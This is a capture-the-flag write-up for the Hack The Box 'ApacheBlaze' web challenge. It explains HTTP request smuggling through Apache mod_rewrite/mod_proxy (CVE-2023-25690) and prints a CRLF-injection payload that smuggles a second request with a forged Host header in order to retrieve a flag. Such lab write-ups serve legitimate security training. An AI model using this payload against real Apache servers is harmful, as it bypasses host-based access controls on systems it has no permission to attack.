Apache Blaze

Challenge description

Step into the ApacheBlaze universe, a world of arcade clicky games. Rumor has it that by playing certain games, you have the chance to win a grand prize. However, before you can dive into the fun, you'll need to crack a puzzle.

Challenge overview

This challenge presents a web application that acts as a front-end for various arcade games. The application proxies requests to a back-end server, which hosts the games. To access the games, users must provide the game name as a query parameter.

Code Review

Apache Configuration (httpd.conf)

RewriteRule "^/api/games/(.*)" "http://127.0.0.1:8080/?game=$1" [P]
ProxyPassReverse "/" "http://127.0.0.1:8080:/api/games/"

The RewriteRule directs requests matching /api/games/(.*) to the back-end at http://127.0.0.1:8080/?game=$1, with the [P] flag indicating proxying. ProxyPassReverse adjusts response headers for the client.

Python Application (app.py)

elif game == 'click_topia':
   if request.headers.get('X-Forwarded-Host') == 'dev.apacheblaze.local':
       return jsonify({
           'message': f'{app.config["FLAG"]}'
       }), 200
   else:
       return jsonify({
           'message': 'This game is currently available only from dev.apacheblaze.local.'
       }), 200

The application checks if the game parameter is 'click_topia' and if the X-Forwarded-Host header equals 'dev.apacheblaze.local'. If both conditions are met, it returns a JSON response containing the flag.

Vulnerability Analysis

The vulnerability arises from the interaction between mod_rewrite and mod_proxy in Apache, which can lead to HTTP request smuggling. Specifically, improper input validation allows crafted requests to manipulate headers, causing the back-end to misinterpret the request.

Exploitation Steps

1. Craft Malicious Request:

   To exploit this, send a request that injects a newline (%0d%0a) to split headers, effectively smuggling a second request:

   GET /api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/ HTTP/1.1

   This payload manipulates the request such that the front-end server interprets it as a single request, while the back-end sees two separate requests.

2. Server Interpretation:

   • Front-End: Processes the request up to the injected newline, treating it as a complete request.
   • Back-End: Interprets the portion after the newline as a new request with the Host header set to dev.apacheblaze.local.

3. Flag Retrieval:

   The back-end application, seeing the Host header as dev.apacheblaze.local and the game parameter as click_topia, returns the flag in its response:

   {
       "message": "HTB{f4k3_fl4g_f0r_t3st1ng}"
   }

With the fake flag retrieved, we can use the same technique to get the real flag on the HTB server.

ApacheBlaze has been Pwned!

Congratulations

0bytes, best of luck in capturing flags ahead!

References

• HTTP Request Smuggling - PortSwigger
• CVE-2023-25690 Proof of Concept
• Apache HTTP Server Vulnerabilities